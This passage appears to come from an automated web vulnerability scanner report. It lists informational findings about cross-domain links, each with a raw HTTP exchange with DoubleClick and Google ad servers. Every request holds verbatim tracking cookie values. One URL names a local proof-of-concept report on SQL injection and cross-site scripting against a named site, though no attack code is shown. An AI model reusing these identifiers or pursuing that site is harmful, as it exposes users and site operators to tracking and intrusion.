Date: Fri, 06 May 2011 21:39:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="te
...[SNIP]...
</script>
<script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script>
...[SNIP]...
24.15. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=naush555;u=9b6b0 HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:35:18 GMT
Expires: Fri, 06 May 2011 22:35:18 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 490

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2576?ret=html&phint=u=9b6b0&phint=ord="></IFRAME> <script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
24.16. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0 HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:35:18 GMT
Expires: Fri, 06 May 2011 22:35:18 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 959

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- LeadBack Pixel: TargetCast -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=expediavis_cs=1&betq=10566=417781" width = "1" height = "1" border = "0"><!-- ContextWeb Pixel: TargetCast -->
<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2250&token=EXPD1" width="1" height="1" border="0"><!-- Yahoo Pixel: TargetCast -->
<img src="http://ad.yieldmanager.com/pixel?id=185942&t=2" width="1" height="1" /><!-- ValueClick Pixel: TargetCast -->
<img src="http://media.fastclick.net/w/tre?ad_id=18527;evt=15397;cat1=18280;cat2=18281;rand=" width="1" height="1" border="0"><!-- Time Axcess Pixel: TargetCast -->
<img src="http://pix04.revsci.net/H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP" height="1" width="1"/></body>
...[SNIP]...
24.17. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:33:33 GMT
Expires: Fri, 06 May 2011 22:33:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- LeadBack Pixel: TargetCast -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=expediavis_cs=1&betq=10566=417781" width = "1" height = "1" border = "0"><!-- ContextWeb Pixel: TargetCast -->
<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2250&token=EXPD1" width="1" height="1" border="0"><!-- Yahoo Pixel: TargetCast -->
<img src="http://ad.yieldmanager.com/pixel?id=185942&t=2" width="1" height="1" /><!-- ValueClick Pixel: TargetCast -->
<img src="http://media.fastclick.net/w/tre?ad_id=18527;evt=15397;cat1=18280;cat2=18281;rand=7169916033744.81" width="1" height="1" border="0"><!-- Time Axcess Pixel: TargetCast -->
<img src="http://pix04.revsci.net/H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP" height="1" width="1"/></body>
...[SNIP]...
24.18. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=naush555;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:33:35 GMT
Expires: Fri, 06 May 2011 22:33:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 533

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81"></IFRAME> <script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
24.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1304752228&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fdirectclassifieds.php%3FmenuCategories%3D8&dt=1304734228433&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304734228437&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1066810904&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1066&bih=968&eid=33895150&ref=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&fu=0&ifi=1&dtd=8&xpc=p67OsqfFw7&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:13:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/directclassifieds.php%253FmenuCategories%253D8%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3DTrinidad.Hyatt.com%26adT%3DHyatt%2BRegency%2BTrinidad%25C2%25AE%26adU%3Dwww.CapitalJazz.com%26adT%3DCapital%2BJazz%2BSuperCruise%26adU%3Dwww.WindstarWeeklyDeals.com%26adT%3DCaribeean%2BCruise%2BDeals%26adU%3Dwww.Tourdeals.com%26adT%3DDiscount%2BExcursions%26gl%3DUS&amp;usg=AFQjCNHa0-Z9l6sPPbX9NhNzwE1sjsKRhw" target=_blank><script>
...[SNIP]...
</script><img alt="Ads by Google" border=0 height=16 onload=tick('abg','_abg') src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script onload=tick('smajs','_smajs') src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752202&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fby-category%2FCruising&dt=1304734202624&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734201376&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=2039250671&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&dff=verdana&dfs=16&biw=1050&bih=968&eid=33895299%2C33895150&fu=0&ifi=2&dtd=29&xpc=Du2GqcuiSi&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
</script><script onload=tick('gjs','_gjs') src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/by-category/Cruising%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.davidround.com%26adT%3DEngineered%2BWinches%26gl%3DUS&amp;usg=AFQjCNFL5sxS9Lpx9hhu4JKlcv5SWm2yeQ" target=_blank><script>
...[SNIP]...
</script><img alt="Ads by Google" border=0 height=16 onload=tick('abg','_abg') src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script onload=tick('smajs','_smajs') src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304748516&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Ffirstmateonlinecom%2Fblind-sql-injection-xss-dork-cross-site-scripting-poc-report.html&dt=1304730515843&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304730516432&frm=0&adk=1607234649&ga_vid=661514294.1304730517&ga_sid=1304730517&ga_hid=1604326988&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=952&fu=0&ifi=1&dtd=977&xpc=LAubdk8We2&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 20:08:40 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DFree%2BVulnerabilityScanner%26gl%3DUS&amp;usg=AFQjCNEb7soOSpCuepSgcxq21uX_2Hu1dQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1302507948&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&dt=1304734213765&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304734213778&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1638908820&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1066&bih=968&ref=http%3A%2F%2Fallatsea.net%2F&fu=0&ifi=1&dtd=16&xpc=dBuTqj4Zth&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:13:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4454

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/subscribe.htm%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.Reputation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHTj-pfjzA50A3S78hvT5_HGU7Sww" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1304752228&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fdirectclassifieds.php%3FmenuCategories%3D8&dt=1304734228433&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304734228437&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1066810904&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1066&bih=968&eid=33895150&ref=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&fu=0&ifi=1&dtd=8&xpc=p67OsqfFw7&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:40 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11993

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/directclassifieds.php%253FmenuCategories%253D8%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.pinplex.com%26adT%3DNEW%2B-%2BPinplex%2BListings%26adU%3DTrinidad.Hyatt.com%26adT%3DHyatt%2BRegency%2BTrinidad%25C2%25AE%26adU%3Dwww.WindstarWeeklyDeals.com%26adT%3DCaribeean%2BCruise%2BDeals%26gl%3DUS&amp;usg=AFQjCNGMZha9iHUihnjHT4WSDXt_PfIz7Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

